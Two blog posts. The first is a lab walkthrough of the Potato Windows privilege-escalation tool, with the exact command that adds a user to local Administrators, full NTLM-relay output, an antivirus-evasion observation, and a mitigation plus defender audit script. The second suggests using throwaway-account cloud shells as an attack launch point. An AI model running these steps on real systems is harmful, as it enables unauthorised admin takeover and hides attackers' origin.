Monday, February 8, 2016

Potato

Discovered this little trick that will escalate a local user on a Windows box and give them local admin rights.  The app is called Potato and it's available at https://github.com/foxglovesec/Potato.

Just to see if this would really work, I set up Windows 7 Enterprise VMs: the first instance running a virus scanner (ESET) and the other running Symantec Endpoint Protection.  Then I downloaded and decompressed the zip file.  Neither scanner cared.  Not necessarily exhaustive research, but as a form of stratified sampling, it will do.


So, the next logical step was to execute it.  The GitHub page does a great job of describing how it works and how to execute it.


From a terminal:

net localgroup administrators - to list the members of the group; in this case the user "hacker" was not yet a member. Then

ipconfig - to get the local IP address of the box. Then I executed the following:

Potato.exe -ip 10.211.55.7 -disable_exhaust true -cmd "C:\\Windows\\System32\\cmd.exe /k net localgroup administrators hacker /add"


That resulted in the following output:


Starting NBNS spoofer...

Clearing dns and nbns cache...
Listening...
Got 127.0.0.1
Spoofed target WPAD succesfully...
Checking for windows defender updates...
Got Request: GET http://127.0.0.1/wpad.dat!
Spoofing wpad...
Got Request: GET http://127.0.0.1/wpad.dat!
Spoofing wpad...
Got Request: HEAD http://download.windowsupdate.comhttp//download.windowsupdate.
com/v9/windowsupdate/redir/muv4wuredir.cab?1602082135!
Redirecting to target..http://localhost/GETHASHES949255
Got Request: GET http://127.0.0.1/wpad.dat!
Spoofing wpad...
Got Request: HEAD http://localhost/GETHASHES949255!
Sending 401...
Got request for hashes...
Got Request: HEAD http://localhost/GETHASHES949255!
Sending 401...
Parsing initial NTLM auth...
NTLM TlRMTVNTUAABAAAAB7IIogkACQA3AAAADwAPACgAAAAGAbAdAAAAD1NFQUxNSU5EU0VUQzI3Q1d
PUktHUk9VUA==
Got Request: GET http://127.0.0.1/wpad.dat!
Spoofing wpad...
Setting up SMB relay...
initSecContext - State 0
initSecContext - State 1
Adding TlRMTVNTUAACAAAAHgAeADgAAAAFwoqiISJWymDPCzaAyKUBAAAAAJgAmABWAAAABgGwHQAAA
A9TAEUAQQBMAE0ASQBOAEQAUwBFAFQAQwAyADcAQwACAB4AUwBFAEEATABNAEkATgBEAFMARQBUAEMAM
gA3AEMAAQAeAFMARQBBAEwATQBJAE4ARABTAEUAVABDADIANwBDAAQAHgBTAEUAQQBMAE0ASQBOAEQAU
wBFAFQAQwAyADcAQwADAB4AUwBFAEEATABNAEkATgBEAFMARQBUAEMAMgA3AEMABwAIAMCeF5u4YtEBA
AAAAA== to queue
Got SMB challenge TlRMTVNTUAACAAAAHgAeADgAAAAFwoqiISJWymDPCzaAyKUBAAAAAJgAmABWAA
AABgGwHQAAAA9TAEUAQQBMAE0ASQBOAEQAUwBFAFQAQwAyADcAQwACAB4AUwBFAEEATABNAEkATgBEAF
MARQBUAEMAMgA3AEMAAQAeAFMARQBBAEwATQBJAE4ARABTAEUAVABDADIANwBDAAQAHgBTAEUAQQBMAE
0ASQBOAEQAUwBFAFQAQwAyADcAQwADAB4AUwBFAEEATABNAEkATgBEAFMARQBUAEMAMgA3AEMABwAIAM
CeF5u4YtEBAAAAAA==
Got Request: HEAD http://localhost/GETHASHES949255!
Sending 401...
Parsing final auth...
TlRMTVNTUAADAAAAAAAAAFgAAAAAAAAAWAAAAAAAAABYAAAAAAAAAFgAAAAAAAAAWAAAAAAAAABYAAAA
BcKIogYBsB0AAAAPQsdH2fWtywYPgDCuRqyEqA==
Got TlRMTVNTUAADAAAAAAAAAFgAAAAAAAAAWAAAAAAAAABYAAAAAAAAAFgAAAAAAAAAWAAAAAAAAABY
AAAABcKIogYBsB0AAAAPQsdH2fWtywYPgDCuRqyEqA==
Successfully started service
Got Request: HEAD http://download.windowsupdate.comhttp//download.windowsupdate.
com/v9/windowsupdate/redir/muv4wuredir.cab?1602082135!
Got Request: HEAD http://download.windowsupdate.comhttp//download.windowsupdate.
com/v9/windowsupdate/redir/muv4wuredir.cab?1602082135!
Got Request: HEAD http://download.windowsupdate.comhttp//download.windowsupdate.
com/v9/windowsupdate/redir/muv4wuredir.cab?1602082135!

Back at the prompt, I ran net localgroup administrators again to check whether the user hacker had indeed been added to the group:


Alias name     administrators

Comment        Administrators have complete and unrestricted access to the computer/domain

Members

-------------------------------------------------------------------------------
Administrator
hacker
sealmindset
The command completed successfully.

It worked. 


But as the author states on the project page, this can be prevented by enabling Extended Protection for Authentication.
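As an added defender-side check (my own example, not code from the post or from the Potato project), the following PowerShell audits whether Extended Protection for Authentication has been suppressed on the host, whether SMB signing is required (a general NTLM-relay mitigation), and whether the local Administrators group matches an expected baseline, parsing the same net localgroup output shown above. It assumes an elevated PowerShell session on Windows 7 or later; $ExpectedAdmins is a constructed baseline for this host.

```powershell
# Added example, not from the post or the Potato project.
# Assumptions: elevated PowerShell on Windows 7+; $ExpectedAdmins is a
# constructed baseline of accounts that belong in local Administrators.
$ExpectedAdmins = @('Administrator', 'sealmindset')

function Get-EpaStatus {
    # KB 968389 value under Lsa: 0 or absent = EPA not suppressed,
    # 1 or 3 = EPA suppressed (applications must still opt in to use EPA).
    $lsa = Get-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Control\Lsa'
    $v = $lsa.SuppressExtendedProtection
    if ($null -eq $v -or $v -eq 0) { return 'NotSuppressed' }
    return "Suppressed($v)"
}

function Get-SmbSigningRequired {
    # Server-side SMB signing requirement; relayed NTLM auth cannot
    # produce a valid session key, so requiring signing blocks the relay.
    $p = Get-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters'
    return [bool]$p.RequireSecuritySignature
}

function Get-UnexpectedLocalAdmins {
    param([string[]]$Expected)
    # Parse 'net localgroup administrators' output: members follow the
    # dashed separator line and end at the "completed successfully" line.
    $lines = net localgroup administrators
    $members = @()
    $inList = $false
    foreach ($line in $lines) {
        if ($line -match '^-{10,}') { $inList = $true; continue }
        if ($line -match 'completed successfully') { break }
        if ($inList -and $line.Trim()) { $members += $line.Trim() }
    }
    return @($members | Where-Object { $Expected -notcontains $_ })
}

"Extended Protection for Authentication: $(Get-EpaStatus)"
"SMB signing required on server: $(Get-SmbSigningRequired)"
$extra = Get-UnexpectedLocalAdmins -Expected $ExpectedAdmins
if ($extra.Count -gt 0) {
    "Unexpected local admins: $($extra -join ', ')"
} else {
    "Local Administrators membership matches baseline"
}
```

Run it before and after a test like the one above: a new name in the "Unexpected local admins" line is the same evidence the post reads off net localgroup by hand.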


Saturday, February 6, 2016

Free Shell

There are countless reasons for needing one, so if you need one Google delivers.

  1. Log in to a throwaway Gmail account
  2. Go to https://console.developers.google.com
  3. Enable an API
  4. Create a project - You have to create it or the button won't appear to be active
  5. Click on the command icon
Bam! You got shell, and a simple sudo -s gets you root...

5 gigs' worth of space running Debian 3.16.  Now the question is, how much information leakage is there if you use this as a launch point...